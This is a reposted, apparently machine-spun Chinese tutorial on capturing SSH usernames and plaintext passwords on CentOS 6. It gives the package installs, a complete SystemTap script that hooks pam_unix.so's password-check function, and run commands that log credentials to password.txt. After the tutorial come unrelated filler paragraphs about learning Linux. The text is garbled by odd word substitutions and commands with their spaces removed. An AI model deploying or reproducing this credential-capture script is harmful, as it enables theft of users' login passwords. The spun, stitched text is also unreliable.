带来一篇centos6.x 抓取ssh登录的用户名和暗码

如果您觉得本篇CentOSLinux教程讲得好，请记得点击右边漂浮的分享程序，把好文章分享给你的小伙伴们！systemtap是一款十分壮大内核调试工具，能够debug良多关于kernel层的成绩。Linux是经由过程PAM模块检测用户信息和认证信息的，从而断定一个用户是不是能够登录体系，使用这个常识点，利用systemtap捕捉一下pam_unix.so该静态库文件的函数挪用，取得用户在ssh近程登录时的用户名和暗码吧。
测试情况：CentOS6.432bit
内核版本：2.6.32-358.el6.i686
起首装置以下rpm包
yum--releasever=6.4update
yuminstall-ysystemtap
debuginfo-install$(rpm-qf/lib/security/pam_unix.so)
创立文件，写进以下代码
touch/root/capture_pass.stp
·#!/usr/bin/stap
·globalusername,pass,isSuccRet=1;
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password")
·{
·username=user_string($name);
·pass=user_string($p);
·}
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password").return
·{
·if($return==0)
·{
·printf("User:%s
Password:%s

",username,pass);
·isSuccRet=0;
·}
·}
·probeprocess("/lib/security/pam_unix.so").function("pam_sm_open_session")
·{
·if(isSuccRet!=0)
·{
·printf("Loginviasshservice.
User:%s
Password:%s

",username,pass);
·}
·isSuccRet=1;
·}
付与可实行权限
chmod+xcapture_pass.stp
创立一个纪录暗码的文件
touchpassword.txt
实行systemstap剧本
stapcapture_pass.stp-opassword.txt

登录/注册后可看大图

当地实行capture_pass.stp剧本，同时ssh近程登录体系，即便第一次登录失利也没有成绩，不会纪录实验输出的毛病暗码。登录乐成后ctl+C停止剧本运转，检察password.txt，乐成捕捉。systemstap很壮大的利器，以是只要超户可使用。

登录/注册后可看大图

来自：https://forum.90sec.org
如果您觉得本篇CentOSLinux教程讲得好，请记得点击右边漂浮的分享程序，把好文章分享给你的好朋友们！

有空一起交流一下

如果上面的措施没有解决问题，此时你就需要Linux社区的帮助了。 Linux的使用者一般都是专业人士，他们有着很好的电脑背景且愿意协助他人。

我学习Linux的心得体会 ，希望对大家的学习有所帮助，由于水平有限，本文难免有所欠缺，望请指正。

掌握硬件配置，如显卡，声卡，网卡等，硬件只要不是太老或太新一般都能被支持，作为一名Linux系统管理员建议多阅读有关硬件配置文章，对各种不支持或支持不太好的硬件有深刻的了解。

学习Linux应具备的。[书籍+网络资源]

随着实验课程的结束，理论课也该结束了，说实话教OS的这两位老师是我们遇到过的不错的老师（这话放这可能不太恰当）.

目前全球有超过一百多个Linux发行版本，在国内也能找到十几个常见版本。如何选择请根据你的需求和能力，RedhatLinux和DebianLinux是网络管理员的理想选择。

主流Linux发行版都自带非常详细的文档（包括手册页和FAQ），从系统安装到系统安全,针对不同层次的人的详尽文档，仔细阅读文档后40%问题都可在此解决。

感谢老师和同学们在学习上对我的帮助。